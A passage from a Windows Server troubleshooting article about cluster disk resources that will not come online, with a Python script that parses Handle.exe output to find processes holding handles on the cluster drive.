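    r"^(?P<process>\S+)\s+pid:\s*(?P<pid>\d+)\s+(?P<user>.*?)\s*"
    r"(?P<handle>[0-9A-Fa-f]+):\s+(?P<path>\S.*)$")

# Assumption: images of products known not to be cluster-aware, keyed by lowercase name.
# Only the case the KB documents is listed; extend it with your own findings.
NON_CLUSTER_AWARE = {
    "smc.exe": "Symantec Endpoint Protection 11 RU5; the KB says RU6 resolves this",
}


def parse_handle_output(text):
    """Turn Handle.exe text into one dict per open handle (header lines are skipped)."""
    entries = []
    for line in text.splitlines():
        m = HANDLE_LINE.match(line.strip())
        if m:
            entries.append({"process": m["process"], "pid": int(m["pid"]),
                            "user": m["user"], "handle": m["handle"], "path": m["path"]})
    return entries


def holders_of(text, drive_letter):
    """Handles whose object path is on the given cluster drive ('Q' or 'Q:')."""
    prefix = drive_letter.rstrip(":").upper() + ":"
    return [e for e in parse_handle_output(text) if e["path"].upper().startswith(prefix)]


def diagnose(holders):
    """One finding per open handle on the failed drive, naming a known culprit if listed."""
    findings = []
    for e in holders:
        who = f"{e['process']} (pid {e['pid']}, {e['user']}) holds handle {e['handle']} on {e['path']}"
        culprit = NON_CLUSTER_AWARE.get(e["process"].lower())
        findings.append(f"{who}: {culprit}" if culprit
                        else f"{who}: not a known non-cluster-aware product, check with the vendor")
    return findings


if __name__ == "__main__":
    for finding in diagnose(holders_of(SAMPLE_HANDLE_OUTPUT, "Q:")):
        print(finding)
```

Run it against the saved output of Handle.exe -a -u Q: taken on the node where the resource failed; anything that still holds a handle on the volume at that moment is what stopped the cluster service from dismounting it cleanly, whether or not it is on the known list.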

More information

For more information about the Handle.exe utility, see Handle v4.22.

The third-party products that this article discusses are manufactured by companies that are independent of Microsoft. Microsoft makes no warranty, implied or otherwise, about the performance or reliability of these products.

Source :
https://docs.microsoft.com/en-us/troubleshoot/windows-server/high-availability/physical-disk-resource-not-come-online
